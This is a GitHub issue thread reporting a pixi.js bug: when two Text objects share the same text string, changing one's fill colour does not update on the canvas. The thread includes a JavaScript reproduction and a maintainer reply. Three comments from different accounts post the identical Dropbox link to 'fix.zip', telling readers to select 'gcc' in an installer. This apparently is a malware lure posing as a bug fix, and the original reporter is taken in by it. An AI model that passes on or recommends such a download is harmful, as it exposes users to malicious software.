### ISSUE TITLE
Bug: pixi text fill color not updating promptly

### ISSUE THREAD

**Issue by NetheriteJam** [pixijs/pixijs#10889]
### Current Behavior

When there are 2 pixi Text **with the same text property**, changing text.style.fill of 1 of them does not promptly update on the canvas.
However, when there is a 3rd pixi Text **with the same text property and does the same updates** as the 1st Text, their color updates promptly on the canvas.

### Expected Behavior

changing text.style.fill promply update on the canvas

### Steps to Reproduce

```javascript
import * as pixi from 'pixi.js';

(async () =>
{
    // Create a new application
    const app = new pixi.Application();

	await app.init({
		background: '#91ffde',
	});

	document.body.appendChild(app.canvas);

	const text1 = new pixi.Text({
		text: 'text',
		style: {
			fill: '#000000',
		},
		x: 100,
		y: 100,
	});

	const text2 = new pixi.Text({
		text: 'text',
		style: {
			fill: '#000000',
		},
		x: 100,
		y: 200,
	});

	const text3 = new pixi.Text({
		text: 'TEXT',
		style: {
			fill: '#000000',
		},
		x: 100,
		y: 300,
	});

	window.addEventListener('mousedown', onclick);
	function onclick() {
		if ( text1.style.fill != '#ffffff' ) {
			text1.style.fill = '#ffffff';
			text3.style.fill = '#ffffff';
		} else {
			text1.style.fill = '#000000';
			text3.style.fill = '#000000';
		}
		console.log(text1.style.fill);
	}

	app.stage.addChild(text1);
	app.stage.addChild(text2);
	app.stage.addChild(text3);
})();
```

### Environment

- **`pixi.js` version**: *8.3.3*
- **Browser & Version**: *Chrome Version 128.0.6613.84 (Official Build) (64-bit)*
- **OS & Version**: *Windows 10*
- **Running Example**: [*demo in pixi play ground*](https://pixijs.com/8.x/playground?state=eyJmaWxlcyI6eyIvc3JjL2luZGV4LmpzIjp7ImNvZGUiOiJpbXBvcnQgKiBhcyBwaXhpIGZyb20gJ3BpeGkuanMnO1xuXG4oYXN5bmMgKCkgPT5cbntcbiAgICAvLyBDcmVhdGUgYSBuZXcgYXBwbGljYXRpb25cbiAgICBjb25zdCBhcHAgPSBuZXcgcGl4aS5BcHBsaWNhdGlvbigpO1xuXG5cdGF3YWl0IGFwcC5pbml0KHtcblx0XHRiYWNrZ3JvdW5kOiAnIzkxZmZkZScsXG5cdH0pO1xuXG5cdGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYXBwLmNhbnZhcyk7XG5cblx0Y29uc3QgdGV4dDEgPSBuZXcgcGl4aS5UZXh0KHtcblx0XHR0ZXh0OiAndGV4dCcsXG5cdFx0c3R5bGU6IHtcblx0XHRcdGZpbGw6ICcjMDAwMDAwJyxcblx0XHR9LFxuXHRcdHg6IDEwMCxcblx0XHR5OiAxMDAsXG5cdH0pO1xuXG5cdGNvbnN0IHRleHQyID0gbmV3IHBpeGkuVGV4dCh7XG5cdFx0dGV4dDogJ3RleHQnLFxuXHRcdHN0eWxlOiB7XG5cdFx0XHRmaWxsOiAnIzAwMDAwMCcsXG5cdFx0fSxcblx0XHR4OiAxMDAsXG5cdFx0eTogMjAwLFxuXHR9KTtcblxuXHRjb25zdCB0ZXh0MyA9IG5ldyBwaXhpLlRleHQoe1xuXHRcdHRleHQ6ICdURVhUJyxcblx0XHRzdHlsZToge1xuXHRcdFx0ZmlsbDogJyMwMDAwMDAnLFxuXHRcdH0sXG5cdFx0eDogMTAwLFxuXHRcdHk6IDMwMCxcblx0fSk7XG5cblx0d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ21vdXNlZG93bicsIG9uY2xpY2spO1xuXHRmdW5jdGlvbiBvbmNsaWNrKCkge1xuXHRcdGlmICggdGV4dDEuc3R5bGUuZmlsbCAhPSAnI2ZmZmZmZicgKSB7XG5cdFx0XHR0ZXh0MS5zdHlsZS5maWxsID0gJyNmZmZmZmYnO1xuXHRcdFx0dGV4dDMuc3R5bGUuZmlsbCA9ICcjZmZmZmZmJztcblx0XHR9IGVsc2Uge1xuXHRcdFx0dGV4dDEuc3R5bGUuZmlsbCA9ICcjMDAwMDAwJztcblx0XHRcdHRleHQzLnN0eWxlLmZpbGwgPSAnIzAwMDAwMCc7XG5cdFx0fVxuXHRcdGNvbnNvbGUubG9nKHRleHQxLnN0eWxlLmZpbGwpO1xuXHR9XG5cblx0YXBwLnN0YWdlLmFkZENoaWxkKHRleHQxKTtcblx0YXBwLnN0YWdlLmFkZENoaWxkKHRleHQyKTtcblx0YXBwLnN0YWdlLmFkZENoaWxkKHRleHQzKTtcbn0pKCk7XG4ifSwiL3NyYy9zdHlsZXMuY3NzIjp7ImNvZGUiOiJib2R5IHsgbWFyZ2luOiAwOyBvdmVyZmxvdzogaGlkZGVuOyB9In0sIi9pbmRleC5odG1sIjp7ImNvZGUiOiJcbjwhRE9DVFlQRSBodG1sPlxuICA8aHRtbD5cbiAgPGhlYWQ%2BXG4gIDx0aXRsZT5QaXhpSlMgUGxheWdyb3VuZDwvdGl0bGU%2BXG4gIDxtZXRhIGNoYXJzZXQ9XCJVVEYtOFwiIC8%2BXG4gIDxsaW5rIHJlbD1cInN0eWxlc2hlZXRcIiBocmVmPVwic3JjL3N0eWxlcy5jc3NcIj5cbjwvaGVhZD5cbjxib2R5PlxuICA8c2NyaXB0IHNyYz1cInNyYy9pbmRleC5qc1wiPjwvc2NyaXB0PlxuPC9ib2R5PlxuPC9odG1sPiJ9LCIvcGFja2FnZS5qc29uIjp7ImNvZGUiOiJ7XG4gIFwic2NyaXB0c1wiOiB7XG4gICAgXCJzdGFydFwiOiBcInBhcmNlbCBpbmRleC5odG1sIC0tb3BlblwiLFxuICAgIFwiYnVpbGRcIjogXCJwYXJjZWwgYnVpbGQgaW5kZXguaHRtbFwiXG4gIH0sXG4gIFwiZGVwZW5kZW5jaWVzXCI6IHtcbiAgICBcInBpeGkuanNcIjogXCI4LjMuMFwiXG4gIH0sXG4gIFwiZGV2RGVwZW5kZW5jaWVzXCI6IHtcbiAgICBcInBhcmNlbC1idW5kbGVyXCI6IFwiXjEuNi4xXCIsXG4gICAgXCJAYmFiZWwvY29yZVwiOiBcIl43LjIxLjNcIixcbiAgICBcIkBiYWJlbC9wbHVnaW4tcHJvcG9zYWwtY2xhc3MtcHJvcGVydGllc1wiOiBcIl43LjEwLjFcIlxuICB9LFxuICBcIm1haW5cIjogXCIvaW5kZXguaHRtbFwiXG59In0sIi8uYmFiZWxyYyI6eyJjb2RlIjoie1xuICBcInByZXNldHNcIjogW1xuICAgIFtcbiAgICAgIFwiQGJhYmVsL3ByZXNldC1lbnZcIixcbiAgICAgIHtcbiAgICAgICAgXCJ1c2VCdWlsdEluc1wiOiBcImVudHJ5XCIsXG4gICAgICAgIFwiY29yZWpzXCI6IFwiMy4yOVwiLFxuICAgICAgICBcInRhcmdldHNcIjogXCJsYXN0IDIgY2hyb21lIHZlcnNpb25zXCJcbiAgICAgIH1cbiAgICBdXG4gIF0sXG4gIFwicGx1Z2luc1wiOiBbXG4gICAgXCJAYmFiZWwvcGx1Z2luLXByb3Bvc2FsLWNsYXNzLXByb3BlcnRpZXNcIlxuICBdXG59In0sIi9zYW5kYm94LmNvbmZpZy5qc29uIjp7ImNvZGUiOiJ7XG4gICAgICAgICAgICAgICAgXCJpbmZpbml0ZUxvb3BQcm90ZWN0aW9uXCI6IGZhbHNlXG4gICAgICAgICAgICB9In19LCJ2aXNpYmxlRmlsZXMiOlsiL3NyYy9pbmRleC5qcyJdLCJhY3RpdmVGaWxlIjoiL3NyYy9pbmRleC5qcyJ9&exampleId=custom)

### Possible Solution

as described in Current Behavior, a simple way to fix might be adding another Text to make it update, but that doesn't solve the issue

### Additional Information

click on the screen and you should find that text1 stops updating after it turns white for the first time

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NetheriteJam** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Thanks for reply! The dropbox link says 'That didn't work for some reason' and I can't manage to fix that. Is there an alternative link?

**Comment by bigtimebuddy** [comment]
Thanks for reporting and for the example @NetheriteJam, someone will take a look at this soon.

**Comment by NetheriteJam** [comment]
> I tried to change the text color with 2 text fields and 3. In both cases, it's working for me. 2 text boxes ![image](https://private-user-images.githubusercontent.com/22808341/361328028-d3543909-db63-4871-9806-db253bbdce60.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NTQzMzgsIm5iZiI6MTcyNDY1NDAzOCwicGF0aCI6Ii8yMjgwODM0MS8zNjEzMjgwMjgtZDM1NDM5MDktZGI2My00ODcxLTk4MDYtZGIyNTNiYmRjZTYwLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDA2MzM1OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWVmMjk3ZDhjYjIwM2U0NTRiY2Y2MDlkNDY0Y2Q2NDlhMzI1YzRiYjRiZWY1MGM2YjAxZjVmMGMzYWY2ZTBiMmQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.ktGVdsmUBY0sKluLRoIuZ-LCcYHFwDBBRTupwQDRvrU)
> 
> 3 text boxes ![image](https://private-user-images.githubusercontent.com/22808341/361328346-ec0564a6-b9d5-4161-b358-c862202207d3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NTQzMzgsIm5iZiI6MTcyNDY1NDAzOCwicGF0aCI6Ii8yMjgwODM0MS8zNjEzMjgzNDYtZWMwNTY0YTYtYjlkNS00MTYxLWIzNTgtYzg2MjIwMjIwN2QzLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDA2MzM1OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTgyMmIyNTM2YjUyZGFlMWM5NWYyNGJhODZmNjQ2MDdjYjZhNGQxMzQ4MzE4NzQ1ZDY5NThjYWFjNTc5MGE1MzUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.CUwr-JwshoUEGzTZmB760Fa37RgzZNhEfjQw2K9w2jU)

The reproduction is not correct. In the case that there are 2 texts, you should **only change the color of one of them**. The 3rd text is just for reference.
In my demo in pixi playground described earlier, it is easy to notice that text1 should change its color to while it actually doesn't. (It only changes to white at first click and doesn't change back to black)
